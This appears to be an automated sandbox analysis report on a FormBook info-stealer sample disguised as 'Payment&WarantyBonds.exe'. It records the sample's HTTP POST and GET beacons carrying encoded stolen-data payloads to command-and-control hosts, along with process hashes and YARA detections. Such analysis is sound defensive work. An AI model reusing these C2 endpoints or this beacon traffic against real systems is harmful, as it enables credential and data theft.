                                                                                                                                                                              47192.168.2.45005434.92.128.59803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:40:44.619338036 CET10821OUTPOST /33ib/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.sgland06.online
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 10299
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.sgland06.online
                                                                                                                                                                              Referer: http://www.sgland06.online/33ib/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 37 38 3d 4e 61 6d 2f 44 66 57 57 37 50 39 48 62 71 68 48 6e 63 54 44 56 67 6b 2b 6c 33 45 43 78 73 74 73 6e 34 76 68 36 65 56 78 7a 6e 6c 4a 49 69 4f 38 7a 48 45 46 51 74 41 77 79 73 46 42 74 56 74 4d 4a 66 4a 48 45 78 41 43 38 6c 46 33 36 75 31 70 2b 67 43 55 37 78 6d 6b 5a 31 6b 46 74 6a 38 53 30 6a 77 61 34 31 51 59 6f 6e 6e 41 43 35 4c 69 35 4b 49 6a 37 73 73 56 70 4c 43 6c 4e 36 59 54 37 49 50 37 5a 6e 63 70 75 7a 74 4e 67 58 39 55 4e 35 30 73 7a 4a 6c 64 31 59 33 6d 58 4b 31 69 54 61 54 6a 39 6b 32 62 6e 78 58 42 67 6f 37 43 72 57 66 43 6f 70 62 50 68 5a 6b 74 4b 30 71 41 62 50 6d 6f 70 6c 49 32 6a 38 39 7a 34 4f 75 52 68 36 64 4f 4c 4c 52 32 44 67 47 51 39 63 4b 52 74 58 45 50 58 72 66 6c 52 63 4c 2f 44 45 33 38 56 77 63 69 78 4e 69 62 6b 6d 69 42 62 72 72 7a 36 73 61 31 57 45 4a 4a 6b 68 4d 32 76 73 65 43 59 4c 37 57 51 74 69 55 6c 53 46 48 57 45 6b 44 6a 57 69 32 71 4a 75 68 31 6e 70 6d 4e 4f 4c 61 6b 6e 6d 4b 41 37 4b 68 56 6f 7a 4e 61 44 7a 39 39 36 61 64 45 31 53 38 77 37 58 4c 57 73 44 [TRUNCATED]
                                                                                                                                                                              Data Ascii: 78=Nam/DfWW7P9HbqhHncTDVgk+l3ECxstsn4vh6eVxznlJIiO8zHEFQtAwysFBtVtMJfJHExAC8lF36u1p+gCU7xmkZ1kFtj8S0jwa41QYonnAC5Li5KIj7ssVpLClN6YT7IP7ZncpuztNgX9UN50szJld1Y3mXK1iTaTj9k2bnxXBgo7CrWfCopbPhZktK0qAbPmoplI2j89z4OuRh6dOLLR2DgGQ9cKRtXEPXrflRcL/DE38VwcixNibkmiBbrrz6sa1WEJJkhM2vseCYL7WQtiUlSFHWEkDjWi2qJuh1npmNOLaknmKA7KhVozNaDz996adE1S8w7XLWsDUtydyj2Lkza9PWhn0xwCdNFEhG7VSzL75IqJcnwBLlZHiBNncZFgf89rqo7mHwPeHGEHCH8VFmLJZqI4pM6iDXI2afHL/xD9yaqc/jDiZwhEImWkj8/1mJSlYTNMXt2PTDbYy6wWTyVEk1OPqP7qHaQ2tZ75UoBuRWmjSdtcpXhtzM9nnAA7pgqDR2Jcpn85CcMWzfuHB2g2SJ8a+bYexuR1fJQQw9KYr1Xn3qpb9ERGrsU8kOrZtKvuryy8LIp74WoQbuziKiPRer1BHBQWvp0wGyHKhc3A6Pu+ou298YFE9s7GUp3JbuTURB9T5i27lj8flGphYz6hge7VPRWi/5NAZLL66VnFDtpYPWip1ipH4DpMkp0fiKtzQ/J2NS4ADcG6Het9yaqCYAjN4uH4u6D224Edw0oRhvUiG3CzlysBmkQkJ7m1tgZBdRbpsJ4ew1zSg7bIYMm6FPUC7sdlYcGhMH5ksNfhvAybVJhvYaRW9icWcQYKXNf4niWaxvzSZzKM81EfTutVwekoAl38AkHkK76pP3w1E9bPChxOAU7T/1IFSr5aNLbmyderpvjfuD2v7IUqdbBL3GEIuU5cg2K/N2l1VK5h1PbEZVdc8L4d5txOatyqpZullCFw2Eif+osPwd4FL22Gmx4yYcef1mSG5m3uReJeYu [TRUNCATED]
                                                                                                                                                                              Oct 31, 2024 01:40:45.598159075 CET838INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:40:45 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2WDU6WvB3C9tJ0sIY%2F0d3rdEIqTy%2FKs0g9Lt4eeJVeDrQ5Ha11t9Jz9AARlBhiOIPwccihoKurDxtnYN4%2BE3Ml4IFyEPmz1WgXJ1JCouZnvs4Lu8cEfCM0HzSzhVYij8E0%2FFYX2yqjDOGw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1970&sent=2&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10841&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                              Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              48192.168.2.45005534.92.128.59803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:40:47.155249119 CET454OUTGET /33ib/?hrOd=1DzdIBZXhZaHw2Wp&78=AYOfApeu9cghctp2i/KTSy5LkW4tz9x7+arej5d+r0NkQieZykYOddwLhoh5ni50J8Z5WiAS8Adn1ZwJ2laV/jmSd394ohUQohZCg1IJ+kicD56x/bghldI= HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.sgland06.online
                                                                                                                                                                              Connection: close
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Oct 31, 2024 01:40:48.113950014 CET852INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:40:47 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6rb1Hsqw0fAtJt7j%2FD5yS3KpWDyWwmpQnXJ7Fcdjx2RIKZrujqcP6ywLD5tAyhsEc9dB6nSI%2Fzn%2BC3fX0svUGjgIe%2Fi49S%2BfcB8TP%2BvniLhVq7aeTxKH3Uppy0vLyGm0qZVupMsFRtz1JA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1808&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=474&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                              Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              49192.168.2.450056152.42.255.48803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:40:53.341141939 CET713OUTPOST /jr4j/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.extrime1.shop
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.extrime1.shop
                                                                                                                                                                              Referer: http://www.extrime1.shop/jr4j/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 37 38 3d 79 73 76 33 6d 69 6c 79 43 31 33 42 6f 6e 71 4a 30 76 38 74 46 68 50 6c 68 58 65 48 6a 63 6c 6d 44 4b 66 37 47 42 2f 34 79 4e 64 50 57 51 4a 42 79 37 7a 6f 32 51 76 78 6d 2f 38 4f 6e 2b 6d 52 51 51 31 41 73 4d 79 67 78 46 42 38 59 32 4d 66 31 72 73 44 76 67 4e 54 38 6e 78 78 6d 39 36 6e 67 69 64 73 49 42 4b 64 79 63 46 65 57 42 73 76 37 76 37 32 38 78 6e 7a 61 4b 4a 46 71 62 58 64 61 63 6a 61 35 53 4e 2b 61 6a 35 4b 65 6c 58 77 2f 37 6d 6a 64 4d 33 58 50 68 5a 42 4d 49 56 39 58 52 2f 54 75 4a 38 50 69 45 7a 6c 39 36 6b 34 41 2f 76 5a 6f 54 63 73 57 69 66 62 35 6a 55 38 4e 67 3d 3d
                                                                                                                                                                              Data Ascii: 78=ysv3milyC13BonqJ0v8tFhPlhXeHjclmDKf7GB/4yNdPWQJBy7zo2Qvxm/8On+mRQQ1AsMygxFB8Y2Mf1rsDvgNT8nxxm96ngidsIBKdycFeWBsv7v728xnzaKJFqbXdacja5SN+aj5KelXw/7mjdM3XPhZBMIV9XR/TuJ8PiEzl96k4A/vZoTcsWifb5jU8Ng==
                                                                                                                                                                              Oct 31, 2024 01:40:54.386487007 CET289INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:40:54 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 146
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              50192.168.2.450057152.42.255.48803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:40:55.881499052 CET733OUTPOST /jr4j/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.extrime1.shop
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.extrime1.shop
                                                                                                                                                                              Referer: http://www.extrime1.shop/jr4j/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 37 38 3d 79 73 76 33 6d 69 6c 79 43 31 33 42 35 33 61 4a 32 4d 55 74 43 42 50 6d 34 6e 65 48 74 38 6c 69 44 4b 44 37 47 46 50 6f 79 2b 35 50 57 31 31 42 31 35 4c 6f 6d 41 76 78 74 66 39 45 34 4f 6d 59 51 51 4a 49 73 4a 53 67 78 46 46 38 59 33 38 66 32 61 73 45 70 67 4e 52 30 48 78 33 72 64 36 6e 67 69 64 73 49 42 32 37 79 63 64 65 57 77 63 76 70 64 54 35 6a 42 6e 77 53 71 4a 46 75 62 57 55 61 63 69 50 35 54 68 55 61 67 52 4b 65 6e 66 77 2f 4a 4f 6b 47 63 33 52 53 52 59 34 4a 36 38 35 65 77 7a 63 76 49 63 55 76 51 43 47 78 63 70 69 52 4f 4f 4f 36 54 34 66 4c 6c 57 76 30 67 70 31 57 6c 74 38 78 48 73 57 49 2f 59 6d 64 72 31 2f 43 2b 32 73 35 37 41 3d
                                                                                                                                                                              Data Ascii: 78=ysv3milyC13B53aJ2MUtCBPm4neHt8liDKD7GFPoy+5PW11B15LomAvxtf9E4OmYQQJIsJSgxFF8Y38f2asEpgNR0Hx3rd6ngidsIB27ycdeWwcvpdT5jBnwSqJFubWUaciP5ThUagRKenfw/JOkGc3RSRY4J685ewzcvIcUvQCGxcpiROOO6T4fLlWv0gp1Wlt8xHsWI/Ymdr1/C+2s57A=
                                                                                                                                                                              Oct 31, 2024 01:40:56.913027048 CET289INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:40:56 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 146
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              51192.168.2.450058152.42.255.48803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:40:58.427463055 CET10815OUTPOST /jr4j/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.extrime1.shop
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 10299
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.extrime1.shop
                                                                                                                                                                              Referer: http://www.extrime1.shop/jr4j/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 37 38 3d 79 73 76 33 6d 69 6c 79 43 31 33 42 35 33 61 4a 32 4d 55 74 43 42 50 6d 34 6e 65 48 74 38 6c 69 44 4b 44 37 47 46 50 6f 79 2b 78 50 58 44 42 42 31 59 4c 6f 30 51 76 78 67 2f 39 48 34 4f 6e 4b 51 55 64 45 73 4a 4f 77 78 48 4e 38 5a 52 6f 66 7a 75 41 45 38 51 4e 52 32 48 78 79 6d 39 36 79 67 69 4e 6f 49 42 47 37 79 63 64 65 57 7a 45 76 35 66 37 35 77 52 6e 7a 61 4b 4a 42 71 62 57 38 61 64 48 30 35 54 6c 75 62 51 78 4b 65 48 76 77 73 71 6d 6b 62 4d 33 54 52 52 59 4a 4a 36 67 32 65 30 53 74 76 49 6f 71 76 58 79 47 37 59 49 35 4b 64 6d 33 6d 6c 77 7a 59 43 36 79 77 53 42 6b 58 47 6c 31 39 30 55 66 63 50 51 77 58 4c 39 33 66 65 61 4d 76 39 76 6e 45 32 6d 6d 73 2b 45 76 5a 69 4a 5a 36 78 34 42 42 4c 73 32 57 6d 74 5a 59 6c 47 6a 52 71 6b 62 41 44 38 4b 69 56 47 6b 50 4d 77 68 4f 65 41 45 36 5a 72 69 68 42 69 62 44 5a 46 45 4f 56 78 78 6f 45 75 41 79 30 2b 34 7a 44 47 32 6e 75 42 44 50 64 61 45 34 59 6c 6f 36 4b 50 47 34 48 36 2f 67 6c 64 30 71 76 52 4b 55 37 4f 6f 54 53 32 56 4a 4b 52 66 47 68 55 [TRUNCATED]
                                                                                                                                                                              Data Ascii: 78=ysv3milyC13B53aJ2MUtCBPm4neHt8liDKD7GFPoy+xPXDBB1YLo0Qvxg/9H4OnKQUdEsJOwxHN8ZRofzuAE8QNR2Hxym96ygiNoIBG7ycdeWzEv5f75wRnzaKJBqbW8adH05TlubQxKeHvwsqmkbM3TRRYJJ6g2e0StvIoqvXyG7YI5Kdm3mlwzYC6ywSBkXGl190UfcPQwXL93feaMv9vnE2mms+EvZiJZ6x4BBLs2WmtZYlGjRqkbAD8KiVGkPMwhOeAE6ZrihBibDZFEOVxxoEuAy0+4zDG2nuBDPdaE4Ylo6KPG4H6/gld0qvRKU7OoTS2VJKRfGhUKTExlc6pwDOcA1A+jAvjcO0XRl3NKhOFt4RgiW1oiVoHLhFUwS9tL9ENRF1TdyOyfM9Pt8eIXuhcK7ls0wHS2mkd5FfdXcgCJWgwIM9yczmy5Cb7gfWXo47Qw5T1AwktatkkomMZdfMZmIKFcoMCbr33gF8ROsJRmxlJ0ckJTOJiKjc/jjQrtlYoGC0MlnrNOyIRSUL4W0lJnanCxk7QAPdui939ujEPnXR24oJhh4hvLZh1AJBP2/IsBBea5PB2JFXkhUti6cf9YOrTQzaObtkWMDP6BQaxXX1NXoCclfH8si5YhFTAFLAa7kcoVOgUetZ2PiAPDF4fwTyA6w43iYc4mM6bM2Slyf+YF3dIYHqkha2o4zTceozQdHMp/NGC0I8ZhfkSJMUeI6gRFFa8T1qXZCnVcXovsZQJQT1i87p4OhcODqm/ikz7XmP9qMNU/xdK0FCVXyXRaE91tX3h6V0xoCn4qPNGaBrUI5wx6DU7WSBdu7SM/FHk5AdzqGzZ64gAphFBErwgWIkPlYWMCPPVw8UmZbsb0QoEUncJKtWHHAVjhri8vu009tzUFr0NjG7ASneSYZRX3Eva9ab5ZiYEoz2trFX/nxb7C9mOXoCLth7RPCUSxbfsXbnLUkehKBHmciJs4iDXbCFe9hqMeUbvKzjmSYf1nN [TRUNCATED]
                                                                                                                                                                              Oct 31, 2024 01:40:59.441508055 CET289INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:40:59 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 146
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              52192.168.2.450059152.42.255.48803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:41:00.965365887 CET452OUTGET /jr4j/?78=/uHXlXwxCWKagG2f+cMqJk/ouEnshdx+b5P4XSvx6MlJZzR/8pbZgxPfuPQh+b7XVC9rmLmVxzweaBtr7+wSxihG8Hktp9qijzhrRRKR+f0leSIT4/3X8Bo=&hrOd=1DzdIBZXhZaHw2Wp HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.extrime1.shop
                                                                                                                                                                              Connection: close
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Oct 31, 2024 01:41:02.016932011 CET289INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:41:01 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 146
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                              Statistics

                                                                                                                                                                              CPU Usage

                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              Memory Usage

                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                              Behavior

                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              System Behavior

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:0
                                                                                                                                                                              Start time:20:36:58
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Users\user\Desktop\Payment&WarantyBonds.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\Payment&WarantyBonds.exe"
                                                                                                                                                                              Imagebase:0x1c0000
                                                                                                                                                                              File size:764'928 bytes
                                                                                                                                                                              MD5 hash:A9DA1B42F6AD80EE6085F69E6C25F49B
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:2
                                                                                                                                                                              Start time:20:37:04
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Users\user\Desktop\Payment&WarantyBonds.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\Payment&WarantyBonds.exe"
                                                                                                                                                                              Imagebase:0xd80000
                                                                                                                                                                              File size:764'928 bytes
                                                                                                                                                                              MD5 hash:A9DA1B42F6AD80EE6085F69E6C25F49B
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2021577870.0000000001740000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2020861134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2022730147.00000000031C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:6
                                                                                                                                                                              Start time:20:37:27
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe"
                                                                                                                                                                              Imagebase:0xe30000
                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4106710053.00000000041D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              General

